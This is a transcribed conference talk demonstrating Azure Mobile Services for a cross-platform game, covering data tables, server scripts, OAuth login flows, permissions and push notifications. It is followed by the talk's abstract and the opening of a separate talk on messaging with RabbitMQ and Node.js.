So when somebody first opens my game and they type in their credentials, I create a little player record for them in this players table. And the games table just contains a record of all the ongoing games. So pretty easy. Let's jump into Visual Studio here. I think I have the phone one and the Win 8 one open side by side; this is the Win 8 one. So the first thing I needed to do in my Win 8 app is add a reference to the Mobile Services SDK. We're actually up on NuGet, so if you go to Manage NuGet Packages, you can see the package I referenced, which is WindowsAzure.MobileServices. That's our package. And, remember, going back to that simplicity-with-enablement thing, we don't want to tie your hands and implement everything in a little closed box that you can't look inside. So we've taken advantage of a lot of the community packages that are out there. Instead of using our own serialization, we use Json.NET. Instead of writing our own HTTP client, we use the HttpClient that ships with the framework. We support portable class libraries, which is a great way to make the same code run across a bunch of different C# platforms. This is why you can easily write ASP.NET code as well using our SDK, because we use portable libraries. So that's great. This is pretty new; our NuGet package has only been out there for a month or two. So that's the first step: pull in the NuGet package. Then I need to configure my connection information. If I go back to the Quick Start here and say I'm using Windows Store, I need the URL and the application key so that my application can talk to the mobile service. It's right in here, and I've pasted it inside my VS instance. I put it in a little separate config file, because I didn't want to accidentally check it into source control or anything. Then I created an instance of MobileServiceClient, which is your entry point into using mobile services. I just created it here and passed in the URI and the application key. So I have my instance here; now I can use it from anywhere inside the app. The first thing I'm going to do is in the page where I list the games. Let's find that: main page. I create references to the two tables that I showed you, the game table and the player table, using the mobile service client that I put in my App static class. And then I have these two local object types, the Game object and the Player object. If you go to the Game class, you'll notice they're just POCOs, plain old C# objects. Nothing special here. I've added some Json.NET serialization attributes, because I prefer to lowercase my properties, but that's really a personal preference; you don't need to add these attributes. They're pretty simple classes, right? Just the game and the names of the players and things like that.
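A minimal sketch of that client-side wiring; the URL and key are placeholders, and the property names on Game are inferred from the demo rather than taken from the actual app:

```csharp
// Entry point into the service (placeholder URL and application key).
public static class App
{
    public static MobileServiceClient MobileService = new MobileServiceClient(
        "https://your-service.azure-mobile.net/",
        "YOUR-APPLICATION-KEY");
}

// Plain POCO; the JsonProperty attributes are only there because the demo
// lowercases the column names -- they are optional.
public class Game
{
    public int Id { get; set; }

    [JsonProperty(PropertyName = "player1")]
    public string Player1 { get; set; }

    [JsonProperty(PropertyName = "player2")]
    public string Player2 { get; set; }

    [JsonProperty(PropertyName = "activePlayer")]
    public string ActivePlayer { get; set; }
}

// Field on the page class: a table reference hanging off the client.
private IMobileServiceTable<Game> gameTable = App.MobileService.GetTable<Game>();

// Typical calls from the page, shape only:
//   var open = await gameTable.Where(g => g.Player2 == null).ToListAsync();
//   await gameTable.InsertAsync(new Game());
```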
So that's pretty easy. But the one thing I want to draw your attention to is in the portal: it never asked me anywhere, when I created these tables, my games and my players (and this is how I'd create a new table if I wanted to), what columns or what schema I want for the table. That's one of the cool things Mobile Services does for you: it will actually look at the object coming in on the wire, the JSON, and try to infer what database columns it needs to create. We call it auto schema or default schema. It will just infer based on what's coming in and pre-populate your table for you, which is a huge time saver if you're quickly prototyping an app. Then when you go to production, you want to turn that off, because you don't want just some random person with Fiddler going in and adding a bunch of new database columns. So you turn off that feature on the Configure tab, the Enable Dynamic Schema setting, when you're done with your development. OK, so we went through that. Now, how do we actually query and insert into this table? Let's go to this refresh method, which is the method that fires whenever somebody lands on that page, basically, after they've authenticated and all that. I'm using LINQ on the client, which is actually pretty sweet. The open games are just games where player one is set to something but player two is not set to something; that's how you know it's an open game. And my games are the games where I'm either player one or player two. It's a pretty ugly-looking LINQ query; imagine how hard that would be if you had to write it in SQL. I mean, it probably wouldn't be that hard if you're a SQL expert, but we try to make it super easy to do things like this. And this is LINQ on the client, but it actually gets serialized and run on your server. So it's not running client side, it's running server side; it's easy, but it also performs pretty well. So that's how you load up a bunch of stuff, and then I call ToListAsync. I write my LINQ query and terminate it with something like that. We can give you a list, or if you want we also have ToCollectionAsync, and we have an incremental-loading collection. These are a bunch of really nice convenience things we added: if you want to bind to that list control in Win8, the infinite scrolling thing, you just use one of our collections that does it out of the box. You don't have to worry about implementing all the loading events and all that. We try to make that super easy. So we covered loading stuff. Let's look at updating something: I go against my table, and there's an UpdateAsync method; I pass it the updated object, very straightforward. Insert as well, very straightforward: just InsertAsync, and I pass it a new object instance, in this case a blank game. If they click New Game, I just create a new blank game and insert it. So that's kind of the basics of the data model on the client. Now let's look at the way we do scripts on the server. If I go back to, let's say, the games table here, and then I go to the scripts tab, let's look at the scripts I actually have. Here's the insert script, which runs when someone tries to create a new game. Let's go piece by piece. You'll notice it has a set shape: the little function has to be called insert, and it has to have these three parameters. The first parameter is the thing they passed me on the wire, deserialized. The second is the user object, which is part of our authentication model, which I'll talk about later. And request is a handle to the incoming and outgoing HTTP request, so you can read things like headers, and you can write stuff out to the response directly if you'd like.
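The empty shape of such a script, before the game-specific logic that gets walked through next, is roughly this; the validation rule is just an illustrative placeholder:

```javascript
// Table insert script -- runs in Node on the server.
// The function name and the three parameters are fixed by Mobile Services.
function insert(item, user, request) {
    // item    - the deserialized JSON the client sent
    // user    - the authenticated caller (populated when the auth flow is used)
    // request - controls the rest of the pipeline

    // Example of a trivial server-side rule (placeholder):
    // if (item.title && item.title.length > 200) {
    //     request.respond(statusCodes.BAD_REQUEST, 'Title too long');
    //     return;
    // }

    request.execute({
        success: function () {
            // runs after the row has been written to the database
            request.respond();
        }
    });
}
```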
Like if they want to pretend to be a different user, so I'll use kind of our authentication to get the right ID. I'm not going to trust the one they configured. I put the state here, which is where I store the actual grid and where each move has happened. Who the active player is. I remove some properties. Then I call request.execute, which is how I tell mobile services, OK, I'm done with this object. Go ahead and process your pipeline going forward and insert it in the database. If I want to run some code after the insert completes into the database, I can add a little callback here and I'll fire after the complete is done. So insert is pretty straightforward. If I go into update, update is kind of the biggest method here. It's kind of huge. My entire game loop is inside this update method. It's a little bit cheating, but let's see what it does. So when they send me an update with a new instance of the game object, I'm not going to trust the game object they sent me, so I'll use this local reference to game table to pull it from the database. So if I want to access another table from inside these scripts, I use kind of this tables global. And I say get table. That's kind of how I get a reference to the table on the server. So I get my own instance. And here's a little query syntax. I say where, and then I can pass an object here, and it'll just do an equality comparison. So I'll say, OK, the item they tried to insert, give me the real one. I don't want to trust the one they gave me. And then when it completes, you call the read method to run the query. And then when it asynchronously completes this success callback will fire. Results will be in this property, obviously. And then I can check here, for example, if there aren't any results. So they're trying to update a game that doesn't exist. I'm just going to go ahead with a request object and just return a 404 right away. So this is a good example of say, OK, I want to break out of the pipeline. I want to say, I'm done processing this. Let's just move on and return a 404. Like there's something wrong with this request. So that's how I abort the pipeline. And if there is actually any results, I say, OK, the game is the first result, because obviously the ID is the primary key, so it has to be the first one. And then depending on what they're doing, whether it's the first time they try to become the second player, I say, OK, they're trying to join the game. Or if there's already a second player, they're trying to probably make a move. It's a little bit silly, my game logic. That's not why you're here to look at my crappy JavaScript. But you kind of get a sense of how you write these server scripts. And they're not as scary as you might think. And we have great documentation in our developer center where you can go and kind of see with the learn a little bit more about the syntax. So we've covered kind of the data stuff. Let me see if there's anything else. I think that's pretty much all I had when it comes to data. Do you guys have any questions so far about how to handle data? Probably somebody's going to ask me, can I use table storage instead of SQL? Because this actually uses SQL server in the back end. The answer is not right now. We're looking into it. That's another very common question. Yep, over there. I'm sorry? I can just video it back end. Right. So the question is, can I just use my own back end instead of the database that we generate for you? That's a really good question. 
And that's really useful if you already have an existing back end. Say you have an on-premise application. Now someone's telling you, I want a cloud version of that. Or actually, no, they're telling you, I want a mobile version of that. So how do you do it? We currently don't support it kind of in a first class way. If your SQL server schema for your table is kind of in a very expected format, it will work. We give you a way to specify a connection string to a different database. But you have to follow our own convention about what your tables are called and all of that. In the future, definitely. Kind of one of the big things in the next six to 12 months for us is kind of enabling these hybrid enterprise scenarios, so either using your own database. Or what's also interesting is from within your server script, using something like a service bus relay to just talk into your enterprise to an existing data store that you don't want to host up in Azure. So the expense app is actually a good example. You don't want to host the expense data up in Azure. You don't want to copy it. You just want to kind of open just one pipe just to that server from the cloud. And you don't want anybody else to have access to that. So that's definitely something that's not there today. But we're looking at that. Question? Can you access the SQL Azure from another server? Yeah, so the SQL server I'll show you, actually. We don't swallow it. Like we don't hide it from you. So if you go back to the portal, if I go up here to my configure, I think, you'll see it tells you, OK, it's the SQL database on this SQL server. So I can just click this arrow and actually take me to the SQL tab in the portal. And I can go and open the SQL management studio and go and look at it myself. So you can back it up and do all those things. So we covered data. That's kind of the first thing we always talk about. And then let's talk about auth. And this is where a lot of people fall asleep a little bit, so tell me if you're super bored. So the main, I'm going to go into the slide, the main goal with auth is to authenticate the app user in the app itself. So you can kind of customize it, show their little smiley face in the corner and put their name, hello, so and so. But also what's more important, actually, more interesting is to authenticate them on the server. So we can have their identity on the server. And then based on that, we can do authorization. And we can create some kind of rules on the server and things like that. So at the end of these authentication flows, we want to have their identity both on the client and the server. So our first authentication flow is what we call server auth. And this is kind of an OAuth 2-based flow using a little browser widget that we invoke. So when you call a login API on mobile service client, and it'll kind of open a little browser, and they'll type in their credentials, you saw me do that in the phone app. So that's kind of the server flow. And it's super simple. It's just one line of code. The developer types their credentials directly into the kind of the website, like a live ID or Facebook. And then the auth provider, still using the browser, will kind of redirect this authentication token back to the mobile service back end. So that's how we get the identity. And then mobile service will pass back to you some parts of that identity. So now you know who the person is, their user ID. So this is kind of the simplest way to do authentication. It uses this little browser control. 
You don't need an SDK from the auth provider. You don't need to figure out live connect or any of those things. This is very easy, but a little bit limited. Because mobile services is the one who manages the authentication token. So if you want to add extra permissions to it, you want to say, I want access to their basic information and their pictures maybe also. You can't really do that, because we manage the token for you. So if you want to do graph access against Facebook or Twitter, it's kind of limited what you can get using this flow. But it is very quick. That's kind of why it's the first one we talk about. We also have a client flow that relies on kind of a device specific, provider specific SDK. So a good example of that is on Windows 8, if I use the live connect SDK, it actually does single sign on for me. So when you saw my Win8 app, I didn't have to type in anything. I'm logged in with my live ID. The app knows exactly who I am. But for that, I have to use a native SDK for live connect. The same for Google and Android, right? They'll do single sign on. The same for Twitter does that. But I know definitely, I think Facebook does it on iOS. Facebook has kind of a built in thing on iOS that can authenticate you. So if you want to take advantage of these capabilities, we enable you to do that. So you'll type in your credentials in whatever their SDK does. It may have some native prompt or I don't know what it does. At this point, mobile services is not involved. And it'll send you back a token. So now you know who the user is. And you requested that token. So you could say, well, I want permission to access their picture library, their friends, their social security number, their credit card. You can add all those claims to the token because you requested it. And then you give it to mobile services so we can also get the identity of the user. So this is kind of a little bit trickier because you need to understand how their auth SDK works. And it's quite a bit more code. But it's powerful because now that token, because you requested it, you can put all the things on it and have quite rich graph access both on the client and on the server. So depending on your needs, if you just want something quick and dirty, use a server flow with the iFrame and kind of passive OAuth. If you want single sign on or rich graph access, you'd probably use the client authentication. I know this is a little bit dense. So let me show you some code here. Here's the, I skipped over the authentication method before. I'll show it to you now. Authenticate, there it is. So in this live auth client, so that comes from this reference I added over here to the live SDK. So I had to pull in the live SDK for win8. So I use, and this is boilerplate code from their documentation. I had to use the live auth client. And I call login on their client. And then when their authentication flow is done, I call this login with Microsoft account. That's how I pass, and then, sorry, you can't see it very well here, I pass the authentication token that they gave me in the result. I pass that back to mobile services so I can authenticate on the server. I could take this token now on the client and continue using it against live to get even more stuff about that user. So that's how it looks on Windows 8. On Windows phone, it is very similar. It's just a few tiny differences, but largely the same SDK. So you can go here, find the authenticate method. You notice it's kind of the same shape, and I end up doing the same thing. 
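The Windows 8 version of that client flow, pulled together, looks roughly like this; it is a sketch based on the Live SDK of that era, so exact member names and the scope used may differ:

```csharp
private async Task AuthenticateAsync()
{
    // Let the Live SDK do single sign-on for the current Windows user.
    var liveAuthClient = new LiveAuthClient("https://your-service.azure-mobile.net/");
    LiveLoginResult result = await liveAuthClient.LoginAsync(new[] { "wl.basic" });

    if (result.Status == LiveConnectSessionStatus.Connected)
    {
        // Hand the Live token to Mobile Services so the server also knows who we are.
        var user = await App.MobileService
            .LoginWithMicrosoftAccountAsync(result.Session.AuthenticationToken);
    }
}
```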
Just pass mobile services authentication token now. So this is the client flow because I want that nice single sign on. Now, if I wanted to do the server flow, let me show you how really easy that is. So I'd say something like, you know, get a reference to my client here, and then I do client login. So notice I'm using a different overload of login. So I just call login async here. And it takes the authentication provider. So I'll say, you know, Facebook. And then I need to await this call because it's synchronous. And then by the time, because it's asynchronous, by the time it's done, now here the user will already be authenticated. This login async will take care of popping up the browser, doing all that dance, getting me back to identity. So at that point, if I go and say client, it's current user, I think. Now, this current user object will give me a bunch of information about the user, like their user ID. And that's kind of their identity at this point. So the moment the second line completes, I have all the off on the client. So you can see how it's much, much simpler. But you get a little bit less by doing it this way. Undo all this. I'm going to break my demo. So yeah, so I showed you the client flow and the server flow from within a.NET app. Now, the one thing that I didn't show you is this didn't just work like that for free. So there's a little bit of server configuration I need to do here in mobile services. So if I go inside my app here, I go to the Identity tab. You notice I've pasted these two values for the Microsoft account. So you know when you create an app with these off providers, they need to know who you are, who's trying to authenticate. So they ask you to go to their little portal and create like a manifestation of what you're doing. So you register there and they ask you who you are. And so they know when people are trying to log in, what are you logging into? And when people log into your app, they'll see a little screen saying, so and so I was trying to get your authentication token to talk to a bunch of our resources. And it says who you are. So to do this, I went to this LiveConnect developer center. And this is a little bit tricky. The UX is not great, but it's documented really well on our Dev Center. So I created an application here. And then the key things that it gave me are the client ID and the client secret. So these are the two things I went and then I go ahead and pasted the two of them into my window here. And just a minute on why this client secret is important. This is to prevent spoofing. So if mobile services receives a token, it needs to have a way to verify that that token was actually issued by the authentication provider, not just some other person sitting in the middle. So it's a shared secret model. So this client secret is known both to Live and to Mobile Services. And you don't ever want to put it in the client, even those called client secret. You never want to do that. It's a server thing that sits there. And so when Live sends that token, it signs it with the secret. And then when Mobile Services receives it, it knows to check that signature using this client secret. It's kind of like a symmetric key kind of thing. So that's how we make sure that we can actually trust that token. So when you get something past your user object, you know that's been verified because we've checked it against this client secret. So speaking of that, let's see what's the model in server script to do authorization. So say someone's authenticated, right? 
How do I tell Mobile Services, OK, only let authenticated people see my data? Don't let anybody else see my data. So if I go to my permissions column here on my games table, you'll notice I have kind of a drop down with a few choices. Everyone is hardly ever used. Anybody with an application key is the default. So that's pretty much, you should consider that to be equivalent to everyone. Because the application key is not really secret. That's something that's bundled into your app in the store. And somebody can download it, reverse engineer it. So you don't want to consider this really like any sort of authorization mechanism. What you really want to do is say only authenticated users. And then you know that people have gone through that authentication flow. And they've presented a valid token that's signed with a correct secret. So this is how I can protect different operations on my table and say, OK, only authenticated people can go ahead and access these. This is very coarse. Like this is only on the operation level. So within an operation, let's see how I can make some more kind of fine-grained decisions. So if I go back to that insert script, somewhere down here, I have a piece of code. So this little thing here. So I have a record of whose turn it is in the game. And you don't want to be able to tell me, OK, well, actually it's my turn. And it's my turn again. So you kind of play yourself all the time. You want to actually protect the other player's turn. So they can try and tell me, OK, I am the active player. But we don't trust that. We actually go and say, OK, user.userID. So we get the ID from the authentication flow to make sure they're not pretending to be the other user. So that's an example where we do this. That's kind of usually how you do this. Also, you'll notice in the players table, I actually keep a record of this user ID. So this is how if somebody logs in, this is how I know they're kind of the same person. When they log in, I always get the same user ID. And so I can associate all their push settings and their name and all that. So that's kind of how I keep a record of them using that user ID. And I only get the user ID if I can figure the off flow. So that's pretty much it for off. Is there any questions? I know it's a little bit quick, but it's a little bit boring also. See a question back there. You're going to have to speak really loud, because I can't hear you at all. I don't have the Android version of this particular app, but I can show you of the login. Yeah, absolutely. That's actually a really good point. So the question is, how does this look in Android? And we've tried to maintain symmetry across all of our SDK. So ideally, if you can write it in.NET, you should be able to write it in Android. So I haven't done this before, but I will go over to our Dev Center and get the answer for you. So if you go in here, we have our authentication tutorial. So you say, get started with authentication. And I'm going to pick Android here, right at the top. And then I'll scroll down here. So there's a little bit of setup and stuff like that. I'll actually find the piece of code where you call login. So there it is, right? So client is the client instance that I created of my mobile services client. I call login. I have the same choice of authentication provider. And then async code looks a little bit different in Android. They don't have a wait, but they have this callback style programming. So this callback fires asynchronously when the thing completes. 
And then on completed, I get a reference to the user. So code looks very similar if you exclude the platform specific things. So I love our Dev Center. It's great. And we have a cheat sheet for all different clients. And you can go and if you want to see how you do this in iOS, which is all going to look like spaghetti to me if I try to actually understand it. But somewhere here, there will be something that looks like a login. Maybe it's this one. I guess? I mean, really? That's it, I think. It's true. OK, great. So we're done with authentication. Let's move on to the kind of the fun part, the push notifications. You had a question? How about your own authentication mechanism, like AD? Yeah, so that's a great question. The question is, can you have your own authentication mechanism? The short answer is currently we don't give you one out of the box. Currently, there's kind of my fellow PM Josh Twist. He has a blog post where he talks about how to do custom authentication. It's kind of going back to this enablement thing. It's very, it's a little bit manual, but you can do it. Going forward, we're definitely considering like a first class thing where you're going to go and federate with Active Directory, make it super easy, kind of the simplicity part. Currently, we're kind of the enablement part when it comes to custom auth. And then we want to get back to the simple thing to enable that as well. Currently, no, though. Currently, almost. Yeah, I don't know if anybody has done it with Active Directory. People have done kind of custom auth like where you have your own table, where you manage usernames and passwords with the right hashing and all of that. I don't know for sure that anybody has done Active Directory. So maybe you'll be the first. And you'll send me an email after. And then I'll talk about it. And people will think I'm smart. So how do push notifications work? So you're probably familiar that all the different phone vendors have their own push notification service. So Microsoft has two, actually, because we're extra special. We have WNS for Windows 8, and we have MPNS for Windows Phone 8. So that's how you push to those devices. Apple has APNS or APN. GCM is for Google. And the regular flow, the way you would do this is, imagine you don't even have mobile services in the picture. The first thing is the device through some magic out of band way registers for a push channel. So I don't know how they do it. Is it HTTP, or is it something like in the network, in the cellular network? I don't know how it does it. But it basically checks in with the notification service and says, OK, here I am. I'm ready to receive push notifications about something. And what it gets in return is this channel, which is kind of its address. So if somebody wants to send a push notification, it can go back to the notification service with that channel and say, send this guy something. So the way we normally do this is, so then the device registers for a channel, then sends it back to mobile services. And mobile services will stash it away in a table somewhere for later use. Probably will stash it with a person's user ID. So then we can later say, OK, this person needs a push notification. So you look up their channel, and you go ahead and you send them a notification directly with the notification service. This is great. It's very simple. But you can see how this will quickly start to fall apart if you are talking about really massive scale here.
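To make that concrete, a rough sketch of the "stash the channel, look it up later, push" pattern in a mobile services server script could look like the following. The table name, property names, and the notifyUser helper are made up for illustration; only the tables and push.wns objects come from the script runtime:

    // Insert script for a hypothetical 'channels' table: store the channel URI
    // alongside the authenticated user who registered it.
    function insert(item, user, request) {
        item.userId = user.userId;
        request.execute();
    }

    // Later, from some other script, look up the channel and push directly.
    function notifyUser(userId, message) {
        var channels = tables.getTable('channels');
        channels.where({ userId: userId }).read({
            success: function (results) {
                results.forEach(function (registration) {
                    // One WNS call per registered device -- fine at small scale,
                    // tedious when you broadcast the same thing to a million users.
                    push.wns.sendToastText01(registration.channelUri, {
                        text1: message
                    });
                });
            }
        });
    }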
So the one problem with this is if you have a million users of your app, and you want to send a single push notifications to all million users, how many calls are you going to be making for mobile services? A million, right? You'll be making a call for every single notification you want to send. So this is great for small scale. And if you don't have these large blasts of notifications where everybody has to get the same one, if it's always the custom notification that's always very specific to just one person, then you're not really wasting much. But if you're broadcasting the same thing to a lot of people, this gets really tedious. So for that, we have this integration with another Azure feature called notification hubs. How many of you have heard about notification hubs? Very few. So it's this extra service that takes away some of this channel management and pushing for you. It's kind of this separate little infrastructure piece that takes that away. So the flow starts the same way. So you'll register your channel with the push service. Then instead of giving it to mobile services, and then you use the developer and mobile services, you have to now create a table and manage it, you give it to notification hubs, and you label it with a tag. So you say, my funky app, or people that should get notifications about app update or something. You create a descriptive tag that describes a group of people that you want to add this to. And then all mobile service has to do is send a single call to that tag saying, OK, everybody who's listening for app updates, I have my new version, I have a bug. You just send one notification to the tag. And notification hubs is responsible for delivering the million notifications through the respective notification service to the million devices that have registered for that tag. So it's kind of a mechanism to deliver push at scale. So notification hubs will do the heavy lifting for you, so then you don't have to do it in your mobile service script. Let's go ahead and do a quick demo, because I only have 12 minutes left. So let's go inside my Windows 8 app here. How many of you have done push notifications with Windows 8 so I can maybe skip over? OK, not very few. OK, a lot. So let's go to this check registration method. So this stuff here is kind of standard Windows 8 stuff. So you say, OK, this is kind of the black magic where the Windows 8 app talks to the notification service and registers. I don't know what happens in this call, but all I know is I get a channel back. And that's a URI that we can now use to address the phone. And then I actually stuff it right inside my player object. So I have this WNS property. It's in the player table where I had all my registered players, and I just send it to the channel URI. So that's all I need to do on the server to capture the channel and send it to the back end. On the phone, it's exactly the same except the property is called MPNS channel. OK, now the interesting part is how do I actually deliver the notification from my back end? So if I go here, I probably guessed that it's inside that giant update script in my game table, such as everything else. So somewhere down here, I have a function that I think right at the bottom. There it is. So this is a function to deliver a toast notification. So you'll notice I use this tables object again. I get my players table from within my game update. And then this is the power of this node model and this JavaScript server model. 
Like I'm actually talking to a different table now from the script for this table. It lets me combine things easily. So I get my players table here. I pull up the records for that user ID. Or there's actually going to be a unique record because user IDs are unique. And then I go ahead and I pull up the channel. So I say, OK, here's the WNS channel. It's just living in that property. The MPNS channel is living in that property. And then we have this very simple API. So we say push.wns, pass the channel, pass your message. And it's pretty much symmetric across the WNS and MPNS. And it's pretty much symmetric across APNS and GCM as well. It's very similar looking. So it's very easy to do it this way. I had to do one little piece of config here, which is again required for the push notification service and mobile service to establish a trust relationship. So for Windows, I had to paste these credentials from one of the portals. It's documented in our docs. MPNS actually doesn't require, it throttles you at 500 notifications per device per day. So they've said, OK, we don't care if you, we just got to throttle you. You don't need to authenticate. Apple actually uses a sockets-based connection to the notification service. So they actually ask you to upload a certificate to authenticate that you get from their portal. And Google has just an API key similar to WNS. So this is kind of where you configure the push, and that's just that one line in the script to send the notification. For notification hubs, I didn't have a demo prepared, because it's not fully baked in to mobile services yet. But I can show you kind of a slightly more advanced way to do it, which is, like I mentioned in Node, it's kind of an extensible thing. And it has similar to NPM. It has a package manager called NPM. And one of the packages on there is the Azure package, which actually my team ships as well. And the Azure package has support for a lot of these Azure services. So if you want to talk from your mobile service back end to blob storage or table storage, you'd use this Azure package. And so you can use notification hubs through the Azure package. So you just reference it. It's already in the box. You just have to say, require Azure to pull it into scope. And then you kind of create your notification hub reference. And then this is how basically you send to, if you just use this syntax, so WNS, send whatever, this whole thing here, you'll send it to all people that are subscribed to that hub. This first parameter, if you specify a string there or a comma-separated list of strings, then that's where you specify the tag, or set of tags you want to push to. If you pass null, it's everybody. If you pass a set of tags, you'll just push to those tags. So again, easy to do that a little bit more advanced, because you have to use an external module. It's not kind of in the box. But it's easy to reference it. OK. So let's kind of push at a glance. And with that, I'm kind of done with our coding demo. Any questions on push? We spent a little bit of time talking about the timeline and where we're headed with this. OK. So like I said, I think mobile service has been around for less than a year. First, we launched our preview with support for Windows 8. That was kind of the first thing we did. These core scenarios, the data often push. Then we quickly kind of added iOS support, Windows Phone 8 support after that. This was, I think, towards the end of last year. 
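The notification hubs call that was just described verbally looks roughly like this from a server script, assuming the azure npm module of that era; the hub name, connection string, and tag below are placeholders:

    // Sketch of pushing through a notification hub from a server script.
    var azure = require('azure');

    var hub = azure.createNotificationHubService(
        'my-hub', 'Endpoint=sb://my-namespace.servicebus.windows.net/;...');

    // Pass null instead of 'app-updates' to broadcast to every registration.
    hub.wns.sendToastText01('app-updates', { text1: 'New version available!' },
        function (error) {
            if (error) {
                console.error('Push failed', error);
            }
        });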
Then early this year, we added a scheduler and support for command line tooling. That's not even something I showed you. But instead of using the portal, you can do a lot of that stuff from command line tooling. It was very recently, about two, three months ago, we added HTML client, notification hubs, Android support. So you see it's kind of very incremental and we're building up on our capabilities. Today, literally today, about six hours ago, we lit up support for custom API and source control. So I'll just kind of show you in the portal where those are. And don't tweet about it until Scott blogs. And then you can all re-blog him. But this is where you do a custom API. A custom API is kind of like a powerful kind of HTTP only script. So for example, if you want to have a submit shopping cart kind of thing, where do you put that? Because that requires updating your list of widgets or whatever you're shipping. And it requires updating your customer table. It requires kind of touching multiple tables. It doesn't make sense really as an insert or update. You see I had that problem with my game script a little bit. My game update, I was putting everything inside the update. So if you have these kind of bigger pieces of script that kind of touch multiple tables, you can just create an arbitrary HTTP API, like submit order. And then you can configure different permissions for the different HTTP operations here. And you can just write your script in a very familiar way. The other thing that literally shipped today is support for source control. So a lot of you may have found it kind of frustrating to edit the scripts in the Azure portal. You don't have to anymore. You just go through the set up source control thing. And I'm not going to go through it. It's a very scary message, actually. It says, do you want to enable source control? This is a preview feature. We recommend that you back up your scripts regularly. So that's pretty intimidating. But if you press that button, you can use Git to push your scripts to your service after backing them up regularly. So these are kind of the two new things. And then there's kind of a bunch of question marks after that. What happens after this? So I can't tell you the order of these boxes, but I can tell you what's in some of them. One of the big ones that is on our mind is general availability for the service. You saw the preview tags everywhere, and kind of the preview language. We're looking to make mobile services generally available sometime this year. So you can kind of put the full backing of Azure with compliance and disaster recovery and all those things built right in so you can really trust us with your data. Another thing is kind of this set of enterprise scenarios that I already talked about, basically connecting to an existing data store, connecting to an on-premise data store. So that's another big direction. A third big direction is what we call brand applications. So we realize a lot of developers out there, a lot of studios and consultancies out there, really have this kind of same sort of requirement. They'll have a customer come and say, build this very cool app that really showcases kind of our brand. Might not be super feature rich, but we need something quickly out there for people to sign up for our fish and chips campaign. It needs to be catchy, but we need to get it done quickly. So we want to tailor for those scenarios as well.
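For reference, the custom API scripts mentioned above are essentially named HTTP handlers. A minimal sketch, with an invented route and payload, could look roughly like this; request.service.tables and statusCodes are part of the script runtime, everything else is made up:

    // api/submitorder.js -- hypothetical custom API handling POST /api/submitorder
    exports.post = function (request, response) {
        var order = request.body;
        // A custom API can touch several tables in one request, which is
        // awkward to express as a single table insert or update script.
        var orders = request.service.tables.getTable('orders');
        orders.insert(order, {
            success: function () {
                response.send(statusCodes.OK, { status: 'accepted' });
            }
        });
    };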
So kind of agencies and then enterprises, big directions going forward for mobile services. And that doesn't mean if you're just an indie developer doing a game with mobile services like I did, that doesn't mean that's not OK. You can still do that. We're still going to support you just the same. But that's kind of where the big new feature areas are going to be. Great. Already touched on this, but in your server scripts, if you want to use Pusher to send push notifications to web browsers, or you want to use SendGrid to send email, or use Twilio to send SMS, we have these partnerships through the Azure Store. So if I go ahead and go into the Azure Store here, I can go ahead and I already have a Pusher extension that I've added before, but I can go ahead and add a new extension here so I can pull in, let's say SendGrid if I want my server script to send some email, let's go find it in the list here. And we automatically configure the billing relationship with SendGrid. Of course, a lot of these are free to start. SendGrid is free for the first couple of thousand emails or something like that. But after that, you'll just get one bill from Microsoft. The SendGrid stuff is going to get added to the bill. You don't have to go and separately register. So that's kind of a neat thing. And last but not least, our customers. We've seen quite good adoption of mobile services, especially in Windows 8. It's hard to make the argument to Android and iOS developers to come and use a Microsoft product and use something with Windows in its name. It's a little bit of a hard sell for us. But as you've seen, the platform itself, there's nothing really Windows specific. All the APIs I showed you, they all work on Android and they all work on iOS. So there's nothing about mobile services, and we use Node on the back end. So there's nothing that traps you into the Microsoft ecosystem if you want to do an iOS app or an Android app. It's just been slightly tricky to get that message across. So please spread the word. One of our very exciting apps in the store is actually VGTV. And this is probably the one country where people know what VGTV is, right? There's no VGTV. Please tell me someone knows. OK, good, OK. All right, good. Yeah, so they're a TV channel and a website, I think, or a website that's trying to turn into a TV channel, or something like that. But they have a great app and they really use everything. They use data. They use push notifications. It's a great app. You can go and grab it in the store right now. So with that, go ahead and sign up. We have a short URL. If you go to windowsazure.com. You can sign up for our service. And with that, I'm pretty much out of time. Thank you very much for staying with us. Out of time, thank you very much for staying around for the last session. Please go ahead and give me any feedback. Send me an email if you loved it or you hated it. If you need more information, my Twitter and Facebook are on there. I can write my, sorry, my Twitter and blog are on there. I can write my email address for you if you have a question. But other than that, thank you very much. And we have unlimited time for questions since it's the last session. So you can be here all night. You don't have to go to the party. This is the parties right here.
|
Azure Mobile Services lets you provision a cloud backend for your mobile apps without the need for server code, while you focus on what's important: your app's user experience. Use any client platform, including iOS, Android, and PhoneGap. Easily configure authentication for your app users with their Facebook, Twitter, Google, or Microsoft Account credentials. With a few lines of code, send push notifications or run scheduled jobs on the server. In this talk we will dive deeply into these areas and implement a rich app ready to submit to the app store.
|
10.5446/51534 (DOI)
|
So, welcome everyone. My name is Álvaro Videla and today I'm going to present about Cloud Messaging with RabbitMQ and Node.js. So a bit about myself. I'm a developer advocate for Cloud Foundry and RabbitMQ as well. That's my blog and that's my Twitter. And I'm the co-author of this book, RabbitMQ in Action. So if you want to get a copy, they have it there at the mini library or mini bookshop they have. So the goal of this talk is to show how we can use RabbitMQ and Node and so on to build an application and how we can decouple the components using RabbitMQ and messaging. So the first question is like why do we need messaging? Okay, I kind of know the answer for that but maybe everybody will say, but I just have a database, I don't know why I should care about this kind of technology. And I always like to illustrate this question with a very simple example that is very easy to understand and to follow. So when we build a classic web application, for example, we can be asked to implement a photo gallery. And when we build this up, we have like an upload picture form and the image gallery, which we can tell the product owner is pretty simple to implement, and we can even have a nicely set up schedule, let's say. But at some point we start to get new requirements. And I mean as we know, no project ends as it was designed from the beginning, right? So we get the product owner, who comes to us and says can we also notify the friends of this user whenever there is a new image upload, and they want to deploy this tomorrow as usual, every feature is urgent for some reason. Then we get a social media guru in the company and he says that they want to give badges to users for each picture upload, similar to what, for example, Foursquare does. And also send everything to Twitter, so to spam every follower basically. I don't know, but two years ago everybody was blocking the Foursquare tag on Twitter, if you remember. Then we have the sysadmin, or as I like to say in Switzerland we have Swiss admins, and these guys will come to you and say that you are delivering the image at full size and of course the bandwidth bill has tripled and they need to get this fixed for yesterday because we are throwing money out of the window. This may sound a bit stupid but in a company I was working at in China we had at some point the bandwidth bill from a video service we built, so in this dating site people could film themselves, you can imagine what they were doing, and they would stream all this video everywhere and at some point all these terabytes came back to us and they were not so happy about the whole feature. So then we have developers in other teams that we usually talk to, not all the time but sometimes, and let's say we implemented the first thing in PHP and they need to call that from Python or even Java. Then there is the user. We always forget that there is somebody that will actually use our feature. Usually we are just like machines shipping code there, we don't even care what the feature is about. We just know that some product owner asked us to implement it. So it's like waterfall-ish, even if these guys are usually doing 